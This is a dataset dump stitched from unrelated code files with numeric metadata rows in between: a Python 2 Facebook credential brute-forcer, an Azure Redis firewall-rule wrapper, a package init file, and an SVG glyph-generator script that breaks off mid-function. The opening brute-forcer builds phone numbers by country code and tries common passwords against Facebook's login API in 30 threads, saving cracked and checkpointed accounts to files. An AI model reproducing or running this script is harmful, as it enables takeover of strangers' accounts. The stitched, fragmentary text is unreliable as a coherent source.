oka.write("[Successful] " +k+c+user+" | "+pass3+"\n")
oka.close()
oks.append(user+pass3)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass3
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass3+"\n")
cps.close()
checkpoint.append(user+pass3)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
print("Useful Codes : 755 855 935 965 975 995")
print
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN India ####
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/india.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/india.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
def bangladesh():
os.system("clear")
print banner
print
print "Useful Codes : 191 To 199"
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN Bangladesh ####
def main(arg):
global checkpoint,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/bang.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/bangla.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
else:
pass2 = 'allah786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/bang.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass2+"\n")
oka.close()
oks.append(user+pass2)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass2
cps = open('save/bang.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass2+"\n")
cps.close()
checkpoint.append(user+pass2)
else:
pass3 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass2
oka = open('save/bang.txt', 'a')
oka.write("[Successful] " +k+c+user+" | "+pass3+"\n")
oka.close()
oks.append(user+pass3)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass3
cps = open('save/pakistan.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass3+"\n")
cps.close()
checkpoint.append(user+pass3)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
def usa():
os.system("clear")
print banner
print
print("Search On Google For USA Area Codes")
print
try:
c = raw_input("[+] Enter 3 Digits Code : ")
exit('[!] Code Must Be 3 Digit ') if len(c) < 3 else ''
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[Press Enter To Back] ")
crack_no()
xxx = str(len(id))
hamza ('\033[1;97m[\033[1;97m✓\033[1;97m]\033[1;97m Total Number \033[1;97m:\033[1;97m '+xxx)
time.sleep(0.5)
hamza ('[✓] The Process Has Started')
time.sleep(0.5)
hamza ('\033[1;97m[\033[1;97m!\033[1;97m] \033[1;97mPress CTRL Z To Stop')
time.sleep(0.5)
print (47*"-")
#### MAIN India ####
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+k+c+user+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;32m[\x1b[1;32mSuccessful\x1b[1;32m]\x1b[1;30m ' + k + c + user + ' \x1b[1;97m|\x1b[1;30m ' + pass1
oka = open('save/india.txt', 'a')
oka.write("[Successful]" +k+c+user+" | "+pass1+"\n")
oka.close()
oks.append(user+pass1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\x1b[1;97m[\x1b[1;97mCheckpoint\x1b[1;97m]\x1b[1;97m ' + k + c + user + ' \x1b[1;97m|\x1b[1;97m ' + pass1
cps = open('save/india.txt', 'a')
cps.write("[Checkpoint] " +k+c+user+" | "+pass1+"\n")
cps.close()
checkpoint.append(user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m----------------------------------------------"
hamza('[✓] Process Has Been Completed.')
hamza('\033[1;97m[✓] Checkpoint IDS Has Been Saved.')
xx = str(len(oks))
xxx = str(len(checkpoint))
print ("[✓] Total \033[1;32mOK/\033[1;97mCP : \033[1;32m"+str(len(oks))+"/\033[1;97m"+str(len(checkpoint)))
print (47*"-")
raw_input("\nPress Enter To Back ")
crack_no()
if __name__ == '__main__':
crack_no()
| 35.139319
| 321
| 0.606123
| 3,447
| 22,700
| 4.006963
| 0.092254
| 0.041703
| 0.03649
| 0.034752
| 0.872719
| 0.870765
| 0.863814
| 0.858167
| 0.855922
| 0.84832
| 0
| 0.118678
| 0.175198
| 22,700
| 645
| 322
| 35.193798
| 0.608556
| 0.009692
| 0
| 0.83101
| 0
| 0.095819
| 0.453085
| 0.198233
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.191638
| 0.015679
| null | null | 0.146341
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
0f99978ee90db509ec39497573c966255046d7b8
| 2,187
|
py
|
Python
|
pyaz/redis/firewall_rules/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/redis/firewall_rules/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/redis/firewall_rules/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
from ... pyaz_utils import _call_az
def create(end_ip, name, resource_group, rule_name, start_ip):
    '''
    Create a redis cache firewall rule (runs `az redis firewall-rules create`).
    Required Parameters:
    - end_ip -- Highest IP address included in the range.
    - name -- Name of the Redis cache.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - rule_name -- The name of the firewall rule.
    - start_ip -- Lowest IP address included in the range.
    '''
    # locals() forwards the parameter names/values as CLI arguments, so the
    # signature must stay in sync with the az command's flags; do not add
    # local variables before this call.
    return _call_az("az redis firewall-rules create", locals())
def update(end_ip, name, resource_group, rule_name, start_ip):
    '''
    Update a redis cache firewall rule (runs `az redis firewall-rules update`).
    Required Parameters:
    - end_ip -- Highest IP address included in the range.
    - name -- Name of the Redis cache.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - rule_name -- The name of the firewall rule.
    - start_ip -- Lowest IP address included in the range.
    '''
    # locals() forwards the parameter names/values as CLI arguments, so the
    # signature must stay in sync with the az command's flags; do not add
    # local variables before this call.
    return _call_az("az redis firewall-rules update", locals())
def delete(name, resource_group, rule_name):
    '''
    Delete a redis cache firewall rule (runs `az redis firewall-rules delete`).
    Required Parameters:
    - name -- Name of the Redis cache.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - rule_name -- The name of the firewall rule.
    '''
    # locals() forwards the parameter names/values as CLI arguments; do not
    # introduce local variables before this call.
    return _call_az("az redis firewall-rules delete", locals())
def show(name, resource_group, rule_name):
    '''
    Show details of a redis cache firewall rule (runs `az redis firewall-rules show`).
    Required Parameters:
    - name -- Name of the Redis cache.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - rule_name -- The name of the firewall rule.
    '''
    # locals() forwards the parameter names/values as CLI arguments; do not
    # introduce local variables before this call.
    return _call_az("az redis firewall-rules show", locals())
def list(name, resource_group):
    '''
    List firewall rules of a redis cache (runs `az redis firewall-rules list`).
    Required Parameters:
    - name -- Name of the Redis cache.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    '''
    # NOTE: the name `list` shadows the builtin, but it is this module's
    # public API (mirrors the az sub-command) and must not be renamed.
    # locals() forwards the parameter names/values as CLI arguments; do not
    # introduce local variables before this call.
    return _call_az("az redis firewall-rules list", locals())
| 33.646154
| 128
| 0.67947
| 302
| 2,187
| 4.791391
| 0.139073
| 0.134762
| 0.055978
| 0.044921
| 0.895646
| 0.895646
| 0.895646
| 0.873531
| 0.873531
| 0.822391
| 0
| 0
| 0.222222
| 2,187
| 64
| 129
| 34.171875
| 0.850676
| 0.631001
| 0
| 0
| 0
| 0
| 0.231013
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| false
| 0
| 0.090909
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
0fa5efe0ce4420f47cf3810bdaaa9408001fa882
| 178
|
py
|
Python
|
topside/procedures/__init__.py
|
roguextech/Waterloo-Rocketry-topside
|
345e7d47efdac04c2c5f70d55f83bd77acdbb511
|
[
"MIT"
] | 4
|
2020-04-18T00:40:55.000Z
|
2021-06-10T04:04:09.000Z
|
topside/procedures/__init__.py
|
roguextech/Waterloo-Rocketry-topside
|
345e7d47efdac04c2c5f70d55f83bd77acdbb511
|
[
"MIT"
] | 82
|
2020-04-15T21:26:04.000Z
|
2022-02-04T04:50:07.000Z
|
topside/procedures/__init__.py
|
roguextech/Waterloo-Rocketry-topside
|
345e7d47efdac04c2c5f70d55f83bd77acdbb511
|
[
"MIT"
] | 8
|
2020-04-21T17:54:36.000Z
|
2022-02-28T16:14:21.000Z
|
from topside.procedures.conditions import *
from topside.procedures.procedures_engine import *
from topside.procedures.procedure import *
from topside.procedures import proclang
| 35.6
| 50
| 0.853933
| 21
| 178
| 7.190476
| 0.380952
| 0.291391
| 0.556291
| 0.536424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 178
| 4
| 51
| 44.5
| 0.932099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
0fc988175a24c5cf9c33f019e21371c7218bf72d
| 85,579
|
py
|
Python
|
scripts/make_svg_files.py
|
jamesscottbrown/parametric-sbolv-1
|
5638c2a30fc9bf14a5616cb18ba7dc3473b7e30f
|
[
"MIT"
] | null | null | null |
scripts/make_svg_files.py
|
jamesscottbrown/parametric-sbolv-1
|
5638c2a30fc9bf14a5616cb18ba7dc3473b7e30f
|
[
"MIT"
] | null | null | null |
scripts/make_svg_files.py
|
jamesscottbrown/parametric-sbolv-1
|
5638c2a30fc9bf14a5616cb18ba7dc3473b7e30f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
################################################################################
# Author: Thomas Gorochowski, Biocompute Lab <tom@chofski.co.uk>
# Last Updated: 10/03/2020
################################################################################
# All drawing is done in SVG frame of reference so (0, 0) is top left increasing
# downwards and to right). This will make it SVG compliant, but some
# manipulation in Python is required for other tools like DNAplotlib to use
# these where bottom left is (0, 0).
################################################################################
import re
import math
# Default width/height (SVG user units) for a generated SVG file.
svg_width = 100
svg_height = 100
# Default baseline start position (SVG frame of reference: y grows downwards).
baseline_x = 0
baseline_y = 0
# Standard styling used for major component types.  Values are raw CSS
# fragments that are copied verbatim into each generated element's
# style="..." attribute by the glyph-building functions below.
style_text = {}
style_text['bounding-box'] = 'fill:none;stroke:rgb(150,150,150);stroke-opacity:0.5;stroke-width:1pt;stroke-linecap:butt;stroke-linejoin:miter;stroke-dasharray:1.5,0.8'
style_text['baseline'] = 'fill:none;stroke:black;stroke-width:1pt'
style_text['unfilled-path'] = 'fill:none;stroke:black;stroke-width:1pt;stroke-linejoin:round;stroke-linecap:round'
style_text['filled-path'] = 'fill:rgb(230,230,230);fill-rule:nonzero;stroke:black;stroke-width:1pt;stroke-linejoin:miter;stroke-linecap:butt'
style_text['filled-background-path'] = 'fill:rgb(255,255,255);fill-rule:nonzero;stroke:none'
def params_to_text (parametric_defaults):
    """Serialise a parameter dict as 'key=value' pairs joined by ';'.

    Keys are emitted in sorted order so the output is deterministic.
    """
    pairs = (key + '=' + str(parametric_defaults[key])
             for key in sorted(parametric_defaults))
    return ';'.join(pairs)
def eval_parameterised_path(parameterised_path_text, params):
    """Replace every {expression} in the path text with str(eval(expression, params)).

    Only brace groups with no nested braces are matched.  Trusted build-time
    templates only: eval() runs arbitrary expressions, and passing `params` as
    the globals mapping lets eval() insert a '__builtins__' key into it.
    """
    def _evaluate(match):
        # Strip the surrounding braces and evaluate the arithmetic expression.
        expression = match.group()[1:-1]
        return str(eval(expression, params))
    return re.sub(r"{([^{}]+)}", _evaluate, parameterised_path_text)
def svg_header (glyphtype, soterms, parametric_defaults=None, width=100, height=100):
    """Return the opening <svg> element for a glyph file.

    Parameters:
    - glyphtype -- value for the custom `glyphtype` attribute (e.g. 'Promoter').
    - soterms -- Sequence Ontology term(s) for the custom `soterms` attribute.
    - parametric_defaults -- dict of parameter defaults, serialised via
      params_to_text() into the `parametric:defaults` attribute (default: {}).
    - width, height -- SVG canvas size in user units.
    """
    # Fix for the shared-mutable-default pitfall: the original signature used
    # `parametric_defaults={}`.  A None sentinel keeps the call contract
    # identical while guaranteeing a fresh dict per call.
    if parametric_defaults is None:
        parametric_defaults = {}
    parametric_defaults_text = params_to_text(parametric_defaults)
    output = ''
    output += '<svg version="1.1"\n'
    output += '     xmlns="http://www.w3.org/2000/svg"\n'
    output += '     xmlns:parametric="//parametric-svg.js.org/v1"\n'
    output += '     width="' + str(width) + '"\n'
    output += '     height="' + str(height) + '"\n'
    output += '     glyphtype="' + glyphtype + '"\n'
    output += '     soterms="' + soterms + '"\n'
    output += '     parametric:defaults="' + parametric_defaults_text + '">\n'
    return output
def bounding_box (x, y, width, height, params, style=style_text['bounding-box']):
    """Return a <rect> element outlining the glyph's bounding box, or '' when
    the module-level INCLUDE_BOUNDING_BOX flag is false.

    x/y/width/height are parametric template strings (e.g. '{x}'); each is
    emitted twice: verbatim as a parametric:* attribute and evaluated (via
    eval_parameterised_path with `params`) as the concrete SVG attribute.

    NOTE(review): INCLUDE_BOUNDING_BOX is not defined in this excerpt —
    presumably a module-level flag set elsewhere in the file; confirm.
    """
    if INCLUDE_BOUNDING_BOX:
        output = ''
        output += '\n<rect class="bounding-box"\n'
        output += '      id="bounding-box"\n'
        output += '      parametric:x="' + x + '"\n'
        output += '      x="' + eval_parameterised_path(x, params) + '"\n'
        output += '      parametric:y="' + y + '"\n'
        output += '      y="' + eval_parameterised_path(y, params) + '"\n'
        output += '      parametric:width="' + width + '"\n'
        output += '      width="' + eval_parameterised_path(width, params) + '"\n'
        output += '      parametric:height="' + height + '"\n'
        output += '      height="' + eval_parameterised_path(height, params) + '"\n'
        output += '      style="' + style + '"/>\n\n'
        return output
    else:
        return ''
def baseline (x, y, width, params, style=style_text['baseline']):
    """Return a horizontal <path> marking the DNA baseline at mid-height, or ''
    when the module-level INCLUDE_BASELINE flag is false.

    x/y/width are parametric template strings; the path template is emitted
    verbatim as parametric:d and evaluated (via eval_parameterised_path with
    `params`) as the concrete d attribute.

    NOTE(review): INCLUDE_BASELINE is not defined in this excerpt —
    presumably a module-level flag set elsewhere in the file; confirm.
    """
    if INCLUDE_BASELINE:
        svg_str = 'M{x},{y+(height/2)} L{x+width},{y+(height/2)}'
        output = ''
        output += '<path class="baseline"\n'
        output += '      id="baseline"\n'
        output += '      parametric:d="' + svg_str + '"\n'
        output += '      d="' + eval_parameterised_path(svg_str, params) + '"\n'
        output += '      parametric:y="' + '{y+(height/2)}' + '"\n'
        output += '      style="' + style + '"/>\n'
        return output
    else:
        return ''
def write_glyph_svg (filename, header_text, glyph_paths):
    """Write a complete SVG glyph file.

    Parameters:
    - filename -- output path for the SVG file.
    - header_text -- opening <svg> markup (e.g. from svg_header/bounding_box/baseline).
    - glyph_paths -- list of dicts mapping <path> attribute names to string
      values; each dict becomes one <path .../> element.

    Fixes over the original: the file is opened with a context manager so the
    handle is closed even if a write raises, and the manual index counter /
    range(len(...)) loops are replaced with direct iteration + enumerate.
    """
    with open(filename, 'w') as f_out:
        f_out.write(header_text + '\n')
        for cur_path in glyph_paths:
            f_out.write('<path ')
            for i, (attr, value) in enumerate(cur_path.items()):
                if i > 0:
                    # Subsequent attributes go on their own line, indented to
                    # align under the '<path ' tag.
                    f_out.write('\n      ')
                f_out.write(attr + '="' + value + '" ')
            f_out.write('/>\n\n')
        f_out.write('</svg>')
###############################################################################
# Functions to create list of elements for each glyph
###############################################################################
def rbs_svg ():
    """Build the RBS (ribosome entry site) glyph.

    Returns (header_text, glyph_paths): the SVG header/bounding-box/baseline
    markup and a list of path-attribute dicts for write_glyph_svg().
    """
    params = {}
    # General parameters
    params['x'] = 0
    params['y'] = 0
    params['width'] = 26
    params['height'] = 60
    params['pad_left'] = 0
    params['pad_right'] = 0
    params['pad_top'] = 0
    params['pad_bottom'] = 0
    # RBS specific parameters
    params['glyph_pad_top'] = 12
    #params['glyph_pad_bottom'] = 30
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('RibosomeEntrySite', 'SO:0000139', parametric_defaults=params, width=params['width'], height=params['height'])
    header_text += bounding_box('{x}', '{y}', '{width}', '{height}', params, style=style_text['bounding-box'])
    header_text += baseline('{x}', '{y}', '{width}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    rbs_path = {}
    rbs_path['class'] = 'filled-path'
    rbs_path['id'] = 'rbs'
    # Closed cubic curve from the left baseline midpoint up and over to the
    # right baseline midpoint (the RBS half-dome shape).
    rbs_path['parametric:d'] = 'M{(x+pad_left)},{y+(height/2)} C{(x+pad_left)},{(y+pad_top)+glyph_pad_top} {x+width-pad_right},{(y+pad_top)+glyph_pad_top} {x+width-pad_right},{y+(height/2)} Z'
    #L{baseline_x+pad_before},{(baseline_y-baseline_offset)}
    rbs_path['d'] = eval_parameterised_path(rbs_path['parametric:d'], params)
    rbs_path['style'] = style_text['filled-path']
    glyph_paths.append(rbs_path)
    return header_text, glyph_paths
def promoter_svg ():
    """Build the promoter glyph (bent arrow: L-shaped body plus open arrowhead).

    Returns (header_text, glyph_paths): the SVG header/bounding-box/baseline
    markup and a list of path-attribute dicts for write_glyph_svg().
    """
    params = {}
    # General parameters
    params['x'] = 0
    params['y'] = 0
    params['width'] = 25
    params['height'] = 60
    params['pad_left'] = 0
    params['pad_right'] = 0
    params['pad_top'] = 0
    # Promoter specific parameters
    params['glyph_pad_top'] = 0
    params['glyph_arrowhead_height'] = 5
    params['glyph_arrowhead_width'] = 5
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Promoter', 'SO:0000167', parametric_defaults=params, width=params['width'], height=params['height'])
    header_text += bounding_box('{x}', '{y}', '{width}', '{height}', params, style=style_text['bounding-box'])
    header_text += baseline('{x}', '{y}', '{width}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    promoter_body_path = {}
    promoter_body_path['class'] = 'unfilled-path'
    promoter_body_path['id'] = 'promoter-body'
    # L-shaped body: up from the baseline midpoint, then across to the right.
    promoter_body_path['parametric:d'] = 'M{x+pad_left},{y+(height/2)} L{x+pad_left},{y+pad_top+glyph_pad_top+glyph_arrowhead_height} L{x+width-pad_right},{y+pad_top+glyph_pad_top+glyph_arrowhead_height}'
    promoter_body_path['d'] = eval_parameterised_path(promoter_body_path['parametric:d'], params)
    promoter_body_path['style'] = style_text['unfilled-path']
    glyph_paths.append(promoter_body_path)
    promoter_head_path = {}
    promoter_head_path['class'] = 'unfilled-path'
    promoter_head_path['id'] = 'promoter-head'
    # Open arrowhead (two strokes) at the right-hand end of the body.
    promoter_head_path['parametric:d'] = 'M{x+width-pad_right-glyph_arrowhead_width},{y+pad_top+glyph_pad_top} L{x+width-pad_right},{y+pad_top+glyph_pad_top+glyph_arrowhead_height} L{x+width-pad_right-glyph_arrowhead_width},{y+pad_top+glyph_pad_top+(glyph_arrowhead_height*2)}'
    promoter_head_path['d'] = eval_parameterised_path(promoter_head_path['parametric:d'], params)
    promoter_head_path['style'] = style_text['unfilled-path']
    glyph_paths.append(promoter_head_path)
    return header_text, glyph_paths
def terminator_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Build the terminator glyph (a 'T': vertical stem plus horizontal cap).

    NOTE(review): baseline_x/baseline_y are accepted but never used in this
    body — presumably kept for signature parity with the other glyph
    builders; confirm before removing.
    Returns (header_text, glyph_paths): the SVG header/bounding-box/baseline
    markup and a list of path-attribute dicts for write_glyph_svg().
    """
    params = {}
    # General parameters
    params['x'] = 0
    params['y'] = 0
    params['width'] = 16
    params['height'] = 60
    params['pad_left'] = 0
    params['pad_right'] = 0
    params['pad_top'] = 0
    # Terminator specific parameters
    params['glyph_pad_top'] = 12
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Terminator', 'SO:0000141', parametric_defaults=params, width=params['width'], height=params['height'])
    header_text += bounding_box('{x}', '{y}', '{width}', '{height}', params, style=style_text['bounding-box'])
    header_text += baseline('{x}', '{y}', '{width}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    terminator_body_path = {}
    terminator_body_path['class'] = 'unfilled-path'
    terminator_body_path['id'] = 'terminator-body'
    # Vertical stem from the baseline midpoint up to the cap.
    terminator_body_path['parametric:d'] = 'M{x+pad_left+((width-x-pad_left-pad_right)/2)},{y+(height/2)} L{x+pad_left+((width-x-pad_left-pad_right)/2)},{y+pad_top+glyph_pad_top}'
    terminator_body_path['d'] = eval_parameterised_path(terminator_body_path['parametric:d'], params)
    terminator_body_path['style'] = style_text['unfilled-path']
    glyph_paths.append(terminator_body_path)
    terminator_head_path = {}
    terminator_head_path['class'] = 'unfilled-path'
    terminator_head_path['id'] = 'terminator-head'
    # Horizontal cap across the top of the stem.
    terminator_head_path['parametric:d'] = 'M{x+pad_left},{y+(pad_top+glyph_pad_top)} L{x+width-pad_right},{y+pad_top+glyph_pad_top}'
    terminator_head_path['d'] = eval_parameterised_path(terminator_head_path['parametric:d'], params)
    terminator_head_path['style'] = style_text['unfilled-path']
    glyph_paths.append(terminator_head_path)
    return header_text, glyph_paths
def cds_svg ():
    """Build the CDS glyph (filled pentagon/arrow pointing right).

    Returns (header_text, glyph_paths): the SVG header/bounding-box/baseline
    markup and a list of path-attribute dicts for write_glyph_svg().
    """
    params = {}
    # General parameters
    params['x'] = 0
    params['y'] = 0
    params['width'] = 60
    params['height'] = 60
    params['pad_left'] = 0
    params['pad_right'] = 0
    params['pad_top'] = 0
    params['pad_bottom'] = 0
    # CDS specific parameters
    params['glyph_pad_top'] = 16
    params['glyph_pad_bottom'] = 16
    params['glyph_arrowhead_length'] = 15
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('CDS', 'SO:0000316', parametric_defaults=params, width=params['width'], height=params['height'])
    header_text += bounding_box('{x}', '{y}', '{width}', '{height}', params, style=style_text['bounding-box'])
    header_text += baseline('{x}', '{y}', '{width}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    cds_path = {}
    cds_path['class'] = 'filled-path'
    cds_path['id'] = 'cds'
    # Closed pentagon: top edge, arrow tip at mid-height, bottom edge, back to start.
